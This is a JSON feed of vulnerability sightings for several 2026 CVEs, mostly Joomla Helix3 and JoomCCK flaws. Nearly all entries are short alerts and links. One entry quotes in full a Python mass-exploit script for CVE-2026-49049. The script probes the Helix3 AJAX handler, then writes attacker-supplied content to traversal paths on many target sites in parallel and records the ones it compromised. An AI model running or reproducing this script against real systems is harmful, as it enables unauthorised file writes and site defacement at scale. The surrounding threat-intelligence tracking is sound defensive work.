{"vulnerability": "cve-2026-4904", "sightings": [{"uuid": "626a50de-fa97-4cf1-b485-ddf876ffbf31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-4904", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mhysypndku2d", "content": "", "creation_timestamp": "2026-03-27T00:04:07.677946Z"}, {"uuid": "8ee3c23c-de3b-4667-89b0-0ad78efa0fe5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-4904", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3mifbr3ipsn2d", "content": "", "creation_timestamp": "2026-03-31T23:00:14.719272Z"}, {"uuid": "36d093f8-95ee-4f2f-aeb6-3d2985a1e2f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-4904", "type": "seen", "source": "Telegram/67MCm8uvWkL1PFFVLqu-Ae9nhYuAfQmsKMFjCSOu4hiA4mc", "content": "", "creation_timestamp": "2026-03-27T01:18:53.000000Z"}, {"uuid": "6249ff3c-b543-4c7c-9add-ee1548891357", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49046", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mmtyalfzif2e", "content": "\ud83d\udfe0 CVE-2026-49046 - High (8.5)\n\nImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerabilit...\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2026-49046/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-27T17:00:50.472541Z"}, {"uuid": "3e3d6507-8940-48c2-aa56-7fb71ac27c20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49046", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mmtz3fj3rtw2", "content": "\ud83d\udfe0 CVE-2026-49046 - High (8.5) Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerabilit... https://www.thehackerwire.com/vulnerability/CVE-2026-49...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-27T17:16:21.208910Z"}, {"uuid": "576c8fc5-2ec0-46ef-bea3-88e40bffb77b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49048", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mpexxobeli2t", "content": "CVE-2026-49048 - Joomla Extension - joomcoder.com - Unauthenticated SQL Injection in JoomCCK extension for Joomla\nCVE ID : CVE-2026-49048\n \n Published : June 28, 2026, 6:37 p.m. | 3\u00a0hours, 8\u00a0minutes ago\n \n Description : The Joomla extension JoomCCK exposes a front-end controll...", "creation_timestamp": "2026-06-28T22:01:19.531764Z"}, {"uuid": "bed7016c-897a-4da4-ac0c-fe9c524786d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49048", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3mpgqfjm6e522", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-49048 \u0432 Joomla: \u0443\u0433\u0440\u043e\u0437\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0441\u043f\u043e\u0441\u043e\u0431\u044b \u0437\u0430\u0449\u0438\u0442\u044b\n\n\n\nhttps://kripta.biz/posts/46284D8C-E3CC-402F-A2BF-682B9A57B875", "creation_timestamp": "2026-06-29T14:51:14.022194Z"}, {"uuid": "1d45859c-5dc1-4953-b492-d90825f9baaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mpgui7cu3k2o", "content": "CVE-2026-49049 - Joomla Extension - joomshaper.com - Unauthenticated access to Helix3 template ajax handler\nCVE ID : CVE-2026-49049\n \n Published : June 29, 2026, 2:34 p.m. | 1\u00a0hour, 11\u00a0minutes ago\n \n Description : The Helix3 plugin for Joomla exposes an ajax handler task, that...", "creation_timestamp": "2026-06-29T16:04:18.913175Z"}, {"uuid": "638f56f2-befa-4bff-a640-fc68b6bfb573", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49048", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116834432112500927", "content": "Attention, elevated activities detected targeting joomcoder JoomCCK Extension (CVE-2026-49048) https://vuldb.com/vuln/374583/cti", "creation_timestamp": "2026-06-29T16:52:36.246030Z"}, {"uuid": "095882b6-f75b-4a25-9cd5-30d09ee54c87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://dnsc.ro/citeste/alerta-vulnerabilitate-exploatata-activ-in-joomla-helix3", "content": "", "creation_timestamp": "2026-07-03T17:15:04.443224Z"}, {"uuid": "88250feb-67da-4a68-b85a-032a6ed4efa7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116860431613611432", "content": "Our CTI team identified a lot of activities targeting joomshaper Helix3 Extension (CVE-2026-49049) https://vuldb.com/vuln/374640/cti", "creation_timestamp": "2026-07-04T07:04:36.244166Z"}, {"uuid": "ad00526e-c7fd-4dd9-ad47-12ee191fb83b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49042", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mpy2mgyaah27", "content": "CVE-2026-49042 - Apache Camel: langchain4j-tools: filter tool argument headers against declared parameters\nCVE ID : CVE-2026-49042\n \n Published : July 6, 2026, 11:16 a.m. | 31\u00a0minutes ago\n \n Description : Improper Input Validation vulnerability in Apache Camel.\n\nThis issue aff...", "creation_timestamp": "2026-07-06T12:09:19.187125Z"}, {"uuid": "9247ffc9-1355-4276-a75f-1c8f6d7c4012", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49042", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mpyuc6aqt52c", "content": "CVE-2026-49042: Apache Camel: langchain4j-tools: filter tool argument headers against declared parameters", "creation_timestamp": "2026-07-06T19:48:51.798439Z"}, {"uuid": "f658123b-c28a-45a0-b722-6749a70f5881", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://bsky.app/profile/suriq.io/post/3mqbr2xluki25", "content": "\ud83d\udd34 EXPLOITED\n\nA botnet is defacing Joomla sites through the Helix3 template framework, no login needed (CVE-2026-49049).\n\nIt hides in your database, so a file scan calls the site clean.\n\nFix: update both Helix3 plugins to 3.1.2, then check your template settings.", "creation_timestamp": "2026-07-10T08:45:06.894455Z"}, {"uuid": "c8f38285-15c9-4143-af6a-ca3aa386b3c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://gist.github.com/6ickzone/aabde4a1ad4f5b88cd0205d13ba4b609", "content": "#!/usr/bin/env python3\nimport requests\nimport sys\nimport os\nfrom concurrent.futures import ThreadPoolExecutor\n\n# Colors\nCYAN = \"\\033[1;36m\"\nGREEN = \"\\033[1;32m\"\nYELLOW = \"\\033[1;33m\"\nRED = \"\\033[1;31m\"\nRESET = \"\\033[0m\"\n\ndef banner():\n    os.system('clear' if os.name == 'posix' else 'cls')\n    print(f\"\"\"{CYAN}\n   \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557  \u2588\u2588\u2557\n  \u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u255a\u2588\u2588\u2557\u2588\u2588\u2554\u255d\n  \u2588\u2588\u2551   \u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2554\u255d \n  \u2588\u2588\u2551   \u2588\u2588\u2551 \u2588\u2588\u2554\u2588\u2588\u2557 \n  \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2554\u255d \u2588\u2588\u2557\n   \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d  \u255a\u2550\u255d\n{RESET}\n[+] Helix3 Multi-Path Scanner\n[+] CVE-2026-49049 | By: 0x6ick\n\"\"\")\n\nHEADERS = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'\n}\n\ndef exploit_target(target, filename, payload):\n    target = target.strip()\n    if not target.startswith(('http://','https://')): target = \"http://\" + target\n    target = target.rstrip('/')\n    \n    session = requests.Session()\n    session.headers.update(HEADERS)\n    \n    paths_to_try = [\n        '../../../' + filename, \n        'templates/shaper_helix3/layouts/' + filename, \n        'tmp/' + filename\n    ]\n    \n    try:\n        probe_url = f\"{target}/index.php?option=com_ajax&amp;plugin=helix3&amp;format=json\"\n        \n        # Probe\n        r = session.post(probe_url, data={'data[action]': 'save', 'data[layoutName]': 'probe', 'data[content]': '{\"t\":\"1\"}'}, timeout=8)\n        \n        if r.status_code == 200 and 'success' in r.text.lower():\n            for path in paths_to_try:\n                data_exploit = {\n                    'data[action]': 'save',\n                    'data[layoutName]': path,\n                    'data[content]': payload\n                }\n                session.post(probe_url, data=data_exploit, timeout=8)\n                \n                check = session.get(f\"{target}/{filename}.json\", timeout=5)\n                \n                if check.status_code == 200:\n                    print(f\"{GREEN}[+] SUCCESS: {target} (Path: {path}){RESET}\")\n                    with open(\"result.txt\", \"a\") as f: f.write(f\"{target}/{filename}.json\\n\")\n                    return True\n            \n            print(f\"{YELLOW}[!] VULN but Write failed on all paths: {target}{RESET}\")\n        else:\n            print(f\"{RED}[-] NOT VULN: {target}{RESET}\")\n            \n    except Exception:\n        print(f\"{RED}[-] ERROR: {target}{RESET}\")\n    return False\n\ndef main():\n    banner()\n    list_file = input(f\"{CYAN}[?] Target list file: {RESET}\")\n    \n    custom_name = input(f\"{CYAN}[?] Filename (default: 0x6ick): {RESET}\") or \"0x6ick\"\n    custom_payload = input(f\"{CYAN}[?] JSON content (default: stamped by 0x6ick): {RESET}\") or \"stamped by 0x6ick\"\n    \n    try:\n        with open(list_file, \"r\") as f:\n            targets = list(set([line.strip() for line in f if line.strip()]))\n        \n        print(f\"\\n{CYAN}[*] Starting mass exploit on {len(targets)} targets...{RESET}\\n\")\n        \n        with ThreadPoolExecutor(max_workers=15) as executor:\n            for t in targets:\n                executor.submit(exploit_target, t, custom_name, custom_payload)\n            \n        print(f\"\\n{GREEN}[+] DONE! Results saved in result.txt{RESET}\")\n        \n    except FileNotFoundError:\n        print(f\"{RED}[!] File not found!{RESET}\")\n\nif __name__ == \"__main__\":\n    main()\n", "creation_timestamp": "2026-07-13T06:01:19.425242Z"}, {"uuid": "d88aa82c-7eb4-470b-8f79-bb5b9a39becd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://t.me/GithubRedTeam/91930", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Vulnerability Scanner\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-49049\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a shinthink\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-04 16:31:37\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRead-only vulnerability scanner for CVE-2026-49049 \u2014 Helix3 Joomla plugin unauthenticated AJAX handler\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-13T22:00:13.059227Z"}, {"uuid": "67cb859f-c4dc-4348-9f3f-3ae0f9e155e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://t.me/GithubRedTeam/92039", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #XSS #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a asdsadsadasdasdsadsad\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a frada321\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-05 12:56:01\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u202fCVE-2026-49049 - Unauthenticated File Deletion, Arbitrary Write &amp; XSS Injection for Helix3 Joomla Extension\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-13T22:00:12.312285Z"}, {"uuid": "67f46422-1add-4800-aa64-45d9d4a09572", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://t.me/GithubRedTeam/91930", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Vulnerability Scanner\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-49049\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a shinthink\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-04 16:31:37\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRead-only vulnerability scanner for CVE-2026-49049 \u2014 Helix3 Joomla plugin unauthenticated AJAX handler\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-14T00:00:21.042619Z"}, {"uuid": "2ed7d88c-e90e-4860-ad53-d1f252c3293f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://t.me/GithubRedTeam/92039", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #XSS #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a asdsadsadasdasdsadsad\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a frada321\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-05 12:56:01\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u202fCVE-2026-49049 - Unauthenticated File Deletion, Arbitrary Write &amp; XSS Injection for Helix3 Joomla Extension\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-14T01:00:14.688169Z"}, {"uuid": "2ca159b3-b4a5-4ca5-83bb-7d278c6b9cb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://t.me/GithubRedTeam/92039", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #XSS #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a asdsadsadasdasdsadsad\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a frada321\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-05 12:56:01\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u202fCVE-2026-49049 - Unauthenticated File Deletion, Arbitrary Write &amp; XSS Injection for Helix3 Joomla Extension\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-15T00:00:29.713327Z"}, {"uuid": "3fc7d3d0-cda8-4527-94c1-7abbb5e15ed7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/91930", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Vulnerability Scanner\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-49049\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a shinthink\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-04 16:31:37\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRead-only vulnerability scanner for CVE-2026-49049 \u2014 Helix3 Joomla plugin unauthenticated AJAX handler\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-15T00:00:29.167064Z"}, {"uuid": "38e23316-8485-4211-bb13-c025b1491fc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://t.me/GithubRedTeam/93283", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #RCE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-49049\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ExDev994\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-13 19:56:12\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-49049 Helix3 (JoomShaper) Joomla Unauthenticated AJAX RCE Scanner\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-16T12:00:07.051404Z"}, {"uuid": "fafe1c02-a723-4e2d-9a92-3e4b2a8b9a74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "Telegram/ebH1a5NEotKwG91diqH39hoyWyfpt3aLkL269Yr45ItICbU", "content": "", "creation_timestamp": "2026-07-16T19:00:08.299560Z"}, {"uuid": "5813ebdc-75fc-4619-80a7-624a998d3b54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "Telegram/7rIIDruJxEl38qBzoHyGM9oWQAxjhN2Km_TAbaElw9hJXAI", "content": "", "creation_timestamp": "2026-07-16T19:00:21.143116Z"}, {"uuid": "ffe2a967-9fb0-4a05-9c8a-dff64debdb49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "Telegram/9Hb4fvIPrKK8606iJIWyf5bhKwWTbv2xyC9a2GDzZG3YJM8", "content": "", "creation_timestamp": "2026-07-16T19:00:22.183302Z"}, {"uuid": "21fb7b6d-eb89-40ba-87af-343ee86d9192", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49048", "type": "seen", "source": "Telegram/V5mTmbk9lnTnZ4jN3rhRcXNWqgo23Po-CHoFPn2rBCSBzO0", "content": "", "creation_timestamp": "2026-07-16T19:00:28.015640Z"}, {"uuid": "8697bbdf-ca31-4b50-b792-4b374854ba05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49048", "type": "seen", "source": "Telegram/qX6uclG6gRLHTMJxNJtazIs1OARckyerT1gitLQMuOtBOu0", "content": "", "creation_timestamp": "2026-07-16T19:00:28.324729Z"}, {"uuid": "aa4a72b9-a60e-4520-993b-be299d3b0534", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "published-proof-of-concept", "source": "Telegram/ebH1a5NEotKwG91diqH39hoyWyfpt3aLkL269Yr45ItICbU", "content": "", "creation_timestamp": "2026-07-17T00:00:09.535902Z"}, {"uuid": "a7543032-1055-442b-ace4-04cb11c9c30f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "Telegram/7rIIDruJxEl38qBzoHyGM9oWQAxjhN2Km_TAbaElw9hJXAI", "content": "", "creation_timestamp": "2026-07-17T00:00:37.558246Z"}, {"uuid": "7852df9c-9dd8-4e0e-b3fe-663658ceb369", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "Telegram/9Hb4fvIPrKK8606iJIWyf5bhKwWTbv2xyC9a2GDzZG3YJM8", "content": "", "creation_timestamp": "2026-07-17T00:00:38.657221Z"}, {"uuid": "5ba9f7ff-ab4d-4210-8b0d-2a2cf0ed6761", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93283", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #RCE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-49049\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ExDev994\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-13 19:56:12\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-49049 Helix3 (JoomShaper) Joomla Unauthenticated AJAX RCE Scanner\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T00:00:49.750325Z"}, {"uuid": "033fd089-837a-4c70-883a-ec23c6ff3fd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49048", "type": "seen", "source": "Telegram/V5mTmbk9lnTnZ4jN3rhRcXNWqgo23Po-CHoFPn2rBCSBzO0", "content": "", "creation_timestamp": "2026-07-17T00:00:44.906446Z"}, {"uuid": "96a6d57c-bbd8-4e98-b2ed-482715a5328f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49048", "type": "seen", "source": "Telegram/qX6uclG6gRLHTMJxNJtazIs1OARckyerT1gitLQMuOtBOu0", "content": "", "creation_timestamp": "2026-07-17T00:00:45.765653Z"}]}